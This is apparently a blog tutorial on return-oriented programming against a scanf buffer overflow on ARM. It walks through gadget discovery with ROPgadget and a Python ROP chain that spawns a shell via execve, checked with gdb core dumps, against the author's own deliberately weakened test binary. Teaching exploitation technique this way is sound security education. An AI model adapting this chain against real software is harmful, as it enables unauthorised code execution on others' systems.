Scanf Buffer Overflow Exploitation on ARM - ROP

Posted on October 15, 2018

Previously I covered how a buffer overflow in the use of the scanf function could be exploited to get a shell. In that article, I mentioned that operating systems had some mitigations in place that I turned off that would have prevented that attack, and mentioned that they could be circumvented with a technique called ROP.

What is ROP

ROP or Return Oriented Programming, is a technique to bypass the protections I mentioned previously, namely a non-executable stack, and the use of Address Space Layout Randomization. Instead of forcing the program to jump to code that the hacker has injected into memory (that is typically mapped as non-executable), ROP instead forces the program to jump to different parts of its own code. Specifically, it forces the program to jump to a couple instructions before a subroutine return, because the subroutine return allows the attacker to force another jump elsewhere in the program.


In the last post, we attacked the program by feeding it a string of the format “aaaaaaaaaaaaaaaaxxxxcccccccccccccc”, where we inserted some padding bytes (‘a’), the address of the code we injected (‘x’), and some executable code (‘c’). This however only works if we know the stack pointer, and the stack is marked as executable memory.

Instead, suppose that our binary contains the instruction:

0x000003be8:    pop {r3, pc}

If we instead modify the address in our string to be the address of this instruction, the program will load the following 4 bytes in our string into r3, and the 4 bytes after that into the program counter (jumping to that location). Our string then becomes “aaaaaaaaaaaaaaaa1111dddd2222”, where we have the address of the pop instruction (‘1’), some data that we want to load into r3 (‘d’), and another location that we want to jump to (‘2’).

Next suppose our binary contains the instructions:

0x000003d40:    add r3, #50
0x000003d44:    pop {r6, pc}

If we then replace the ’2’s in the previous string, with the address of the add instruction, then append some data we want to load into r6 (or dummy data if we don’t care about r6), and another address to jump to, we can successfully carry out some computation (r3 = something+50), without executing code we injected.

The attack

Before we begin, we need to set up our program. The source of mine will not be released to protect the guilty, however, it contains the following vulnerable snippet:

To do the attack, we’ll need to compile this program and statically link in libc like so:

gcc test.c -fno-stack-protector -g -O0 -o test -static

We still need stack protection disabled (this turns off gcc’s checks to make sure the stack hasn’t overflowed), and it requires statically linking in libc (to make sure we have enough “gadgets”, more on that later), but we no longer need the -z execstack flag.

Next, we need to turn on core dumps with

ulimit -c unlimited

Next, we need a way to find the instruction sequences to use in the attack. This could be done manually, but I decided to use the ROPgadget tool which makes finding the sequences easier. The tool can be installed like so:

pip install capstone
pip install ropgadget

Finding Gadgets

Now we need to find the gadgets (short sequences of instructions that end in a return) that can be used in the exploit. To do this run

ROPgadget --binary test --thumb > gadgets.txt

This will take a while, but eventually you’ll be left with a gadgets.txt that contains something resembling:

0x0002c6ca : add r0, r4 ; add sp, #0x10 ; pop {r4, pc}
0x0002c6fe : add r0, r4 ; add sp, #0x2c ; pop {r4, r5, pc}
0x00021f34 : vtbl.8 d22, {d25}, d16 ; cbz r0, #0x21f4e ; mov r1, r5 ; bl #0x21f36 ; ldr r0, [r4] ; blx r5
0x00021f3e : vtbl.8 d22, {d4}, d16 ; blx r5

Unique gadgets found: 5497

Note that I had the tool scan for gadgets in thumb mode. This is because thumb/thumb2 instructions are 2-4 bytes long and aligned to 2 bytes, meaning a gadget could be constructed from a 4 byte arm instruction that is not a return, and multiple gadgets can be constructed from one address. However, this means that when the addresses of the gadgets are injected into the program, they need to have 1 added to them.

Chain Construction

Now, we need to assemble these gadgets to do something useful. In my case, I want to execute the execve system call, to spawn a shell, which requires the following things: * r0 points to “/bin/sh\0” * r1 is 0 * r2 is 0 * r7 is 11 * an svc instruction is executed

Argument 1, /bin/sh

First, I want to force r0 to point to “/bin/sh”, by placing “/bin/sh” on the stack, loading sp into r0, and adding an offset to it so that it will point to “/bin/sh”.

Looking through the gadgets, I found 5 good candidates

0x0003ac5a : mov r1, sp ; mov r0, r4 ; blx r3
0x00016474 : pop {r3, pc}
0x00024024 : pop {r0, r1, r2, r3, r5, pc}
0x0001b32a : mov r4, r1 ; blx r3
0x0003002e : add r4, r0 ; mov r0, r4 ; pop {r4, pc}

Unfortunately, I don’t have a gadget to mov r0 into sp, nor is there one that will add r0 to some register without a lot of side effects (other instructions after the add). So we will have to build this operation out of the above 5 gadgets. Something like this:

g1: pop {r3, pc}  // load r3 with the address of g3
g2: mov r1, sp    // set r1 to sp
    mov r0, r4    // junk instruction, don't care about this one
    blx r3        // continue on to g3
g3: pop {r3, pc}  // load r3 with the address of g5
g4: mov r4, r1    // mov r1 into r4 so we can add to it later
    bx r3         // continue to g5
g5: pop {r0, r1, r2, r3, r5, pc}    // load r0 with the constant we
                                    //want to add to sp
g6: add r4, r0    // do the addition
    mov r0, r4    // r0 now points to /bin/sh
    pop {r4, pc}

To do this, I wrote a python script to output the data to the program:

Next, let’s actually start on the output

p = ''
p += emit(pop_r3_pc) # load the address of g3 into r3 and continue to g2
p += emit(pop_r3_pc) # g3
p += emit(movr1sp_movr0r4_blxr3) #g2

# g3 will now run 'pop {r3, pc}'
p += emit(pop_r0r1r2r3r5pc) # this will be loaded into r3 to be run
                            # after g4
p += emit(mov_r4r1_bxr3)    # g5

# This is the data to be loaded into the registers in g4
p += emit(0x58)   # r0 - this is our offset
p += emit(0x0)    # r1 - set to 0 for exceve
p += emit(0x0)    # r2 - don't care, will be overwritten
p += emit(0x61616161) # r3 - don't care
p += emit(0x61616161) # r5 - dont't care

# g6, this will do the add and set r0 to point to /bin/sh (eventually)
p += emit(add_r4r0_mov_r0r4_pop_r4pc)
p += emit(0x61616161) # r4 - don't care
p += emit(0x61616161) # jump to invalid address to crash so we can
                      # inspect the core dump
                      # this will need to be changed to continue the change

Unfortunately, because some of the gadgets end in blx r3 instead of a pop {..., pc}, the control flow is a bit hard to follow.

Finally, let’s write the code to output our data to the program

sys.stdout.write('n' + 'a'*16)

and try running it

$ python | ./test

Segmentation fault (core dumped)

And open the core dump in gdb:

$ gdb test
(gdb) core core
#0  0x61616160 in ?? ()
(gdb) p/x $r0
$1 = 0xbed8b610
(gdb) p/x $sp
$2 = 0xbed8b5e0

Excellent! r0 is set to an offset of sp, and we can change the offset later once the rest of the exploit is done.

System call number, r7 = 11

Thankfully, our executable provides plenty of pop primitives, including one that pops into r7. Unfortunately, we need r7 to be 11, which corresponds to the vertical tab character, which stops scanf. So we cannot directly load 11 into r7, we will need to add a constant to it.

Some candidate gadgets:

0x000103bc : pop {r4, pc}
0x0001b39e : adds r4, #0x84 ; blx r3
0x00014fae : mov r2, r4 ; blx r3 
0x00019510 : mov r7, r2 ; blx r3

Building this sequence is really difficult. There’s no useable add r7, #x gadget, nor is there a mov r7, r4 gadget, AND all of these gadgets end in a blx r3 instead of pop {..., pc} so I have to place pop {r3, pc} gadgets between each of these like so:

g1: pop {r4, pc}   // load r4 with 0x0b - 0x84
g2: pop {r3, pc}   // load r3 with g4
g3: adds r4, #0x84 // compute r4 = 0x0b
    blx r3
g4: pop {r3, pc}   // load r3 with g6
g5: mov r2, r4     // mov r4 into r2
    blx r3
g6: pop {r3, pc}   // load r3 with g8
g7: mov r7, r2     // finally load 0x0b into r7
    blx r3

Now to place them in the python file, change the line that I mentioned needed to be changed later to

p += emit(pop_r4pc)   # g1

then add the following lines after it:

p += emit(0xffffff87)  # 0x0b-0x84
p += emit(pop_r3_pc)   # g2
p += emit(pop_r3_pc)   # g4
p += emit(adds_r484_bxr3) # g3
p += emit(pop_r3_pc)      # g6
p += emit(mov_r2r4_bxr3)  # g5
p += emit(0x61616161)     # g8 - this will need to be changed when extending the chain
p += emit(mov_r7r2_bxr3)  # g7 

And now let’s run it again:

$ python | ./test

Segmentation fault (core dumped)
$ gdb test
(gdb) core core
#0  0x61616160 in ?? ()
(gdb) p/x $r7
$1 = 0xb
(gdb) p/x $r2
$4 = 0xb

Excellent! r7 is now set to 0x0b! We’re almost done, we just need to set r2 back to 0 and run the svc instruction

Argument 2, r2 = 0 and the SVC instruction

The only new gadget we need is this one:

0x00022996 : svc #0

We’ll need to do the following sequence:

g1: pop r4, pc    // set r4 to 0
g2: pop r3, pc    // set r3 to g4
g3: mov r2, r4    // mov r4 into r2 (setting r2 to 0)
    blx r3
g4: svc #0        // finally do our execve syscall

In the python program, change the line that I mentioned in the last section to

p += emit(pop_r4pc)

then append the following lines:

p += emit(0)           # the data for the pop {r4, pc}
p += emit(pop_r3_pc)   # g2, load r3 with g4
p += emit(svc_0)       # g4
p += emit(mov_r2r4_bxr3)  # g3, continue to g4
p += '/bin/sh\0'

and run it:

$ python | ./test


Once again, we got the shell but it immediately exited because there was no more data at the input. Let’s apply the same trick as last time:

$ (python; cat) | ./test

Makefile  core   gadgets_thumb  main.c    main_rop_bak   shellcode    shellcode.s  test.c
bytes     core_  main       main_rop    shell.pyc  shellcode.o  test



ROP is a powerful technique for exploiting vulnerabilities on systems with ASLR and non-executable stacks. It still is hindered by systems that randomize the addresses of executable code, but can still be done if a sidechannel to leak the address information is available.